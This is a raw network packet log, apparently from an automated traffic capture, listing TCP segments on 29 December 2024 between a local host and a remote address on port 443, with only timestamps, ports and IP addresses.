                                                                                                                  Dec 29, 2024 08:56:24.638026953 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:24.638072968 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:24.638077974 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:24.638112068 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:24.638154984 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:24.802556992 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:24.802577019 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:24.802653074 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:24.802661896 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:24.802710056 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:24.808612108 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:24.808630943 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:24.808711052 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:24.808717966 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:24.808762074 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:24.815573931 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:24.815588951 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:24.815665007 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:24.815670013 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:24.815712929 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:24.822386026 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:24.822401047 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:24.822468996 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:24.822474957 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:24.822499990 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:24.822520018 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:24.829338074 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:24.829355955 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:24.829449892 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:24.829463005 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:24.829507113 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:24.835752964 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:24.835768938 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:24.835833073 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:24.835839033 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:24.835879087 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:24.841821909 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:24.841837883 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:24.841909885 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:24.841916084 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:24.841953993 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:24.848891020 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:24.848906040 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:24.848982096 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:24.848989010 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:24.849036932 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.012993097 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.013014078 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.013133049 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.013142109 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.013186932 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.019826889 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.019843102 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.019942045 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.019948006 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.019993067 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.026782990 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.026798010 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.026899099 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.026905060 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.026951075 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.032833099 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.032846928 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.032928944 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.032933950 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.032973051 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.040170908 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.040185928 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.040249109 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.040255070 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.040307999 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.046242952 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.046258926 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.046345949 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.046351910 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.046396017 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.053107977 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.053124905 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.053190947 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.053195953 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.053237915 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.059989929 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.060004950 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.060069084 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.060075045 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.060117006 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.223917961 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.223936081 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.223997116 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.224008083 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.224052906 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.230868101 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.230884075 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.230936050 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.230942011 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.230978966 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.236886024 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.236900091 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.236954927 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.236960888 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.236995935 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.243832111 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.243845940 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.243900061 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.243906021 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.243947983 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.250668049 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.250683069 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.250781059 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.250787020 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.250819921 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.257194996 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.257210970 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.257270098 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.257276058 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.257316113 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.264066935 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.264082909 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.264151096 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.264157057 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.264197111 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.270143032 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.270159006 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.270215988 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.270220995 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.270258904 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.434464931 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.434483051 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.434669971 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.434676886 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.434740067 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.441414118 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.441432953 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.441495895 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.441499949 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.441534042 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.447467089 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.447483063 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.447551966 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.447556973 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.447577000 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.447592020 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.454453945 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.454471111 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.454533100 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.454539061 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.454576015 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.461230040 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.461245060 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.461304903 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.461309910 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.461349964 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.467708111 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.467725039 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.467783928 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.467789888 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.467850924 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.474647999 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.474663973 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.474730015 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.474736929 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.474776983 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.478595018 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.478671074 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.478676081 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.528507948 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.580724955 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.643326998 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.643338919 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.643373013 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.643414021 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.643419027 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.643426895 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.643476963 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.650130033 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.650137901 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.650163889 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.650188923 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.650194883 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.650204897 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.650233030 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.657054901 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.657071114 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.657139063 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.657145023 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.657182932 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.663105965 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.663120031 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.663189888 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.663196087 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.663229942 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.670075893 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.670092106 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.670151949 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.670161009 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.670197010 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.676512957 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.676528931 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.676587105 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.676593065 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.676628113 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.683346987 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.683363914 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.683424950 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.683429956 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.683469057 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.688594103 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.688682079 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.690299034 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.690313101 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.690344095 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.690346956 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.690396070 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.690396070 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.854130983 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.854151964 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.854218006 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.854233027 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.854274988 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.855624914 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.860908985 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.860924006 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.860996962 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.861005068 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.861043930 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.867858887 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.867875099 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.867959023 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.867965937 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.868017912 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.873935938 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.873951912 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.874025106 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.874034882 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.874069929 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.874221087 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.880775928 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.880790949 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.880861044 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.880867004 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.880916119 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.887326956 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.887345076 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.887394905 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.887402058 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.887439013 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.894314051 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.894328117 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.894416094 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.894422054 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.894467115 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.901055098 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.901070118 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.901135921 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.901140928 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:25.901181936 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.913089037 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:25.916527033 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.065141916 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.065162897 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.065294981 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.065304995 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.065356016 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.072038889 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.072056055 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.072118044 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.072124958 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.072176933 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.079057932 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.079075098 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.079138994 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.079144001 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.079184055 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.084922075 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.084938049 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.085001945 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.085006952 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.085047007 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.091854095 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.091870070 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.091953993 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.091959000 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.092000961 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.098323107 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.098342896 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.098411083 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.098417997 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.098460913 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.105321884 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.105340004 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.105410099 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.105416059 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.105462074 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.112104893 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.112123013 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.112159967 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.112164974 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.112198114 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.112216949 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.275778055 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.275799990 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.275986910 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.275998116 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.276050091 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.282655954 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.282672882 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.282752037 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.282757998 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.282800913 CET49796443192.168.2.5172.67.208.58
                                                                                                                  Dec 29, 2024 08:56:26.289530039 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.289546013 CET44349796172.67.208.58192.168.2.5
                                                                                                                  Dec 29, 2024 08:56:26.289618969 CET49796443192.168.2.5172.67.208.58
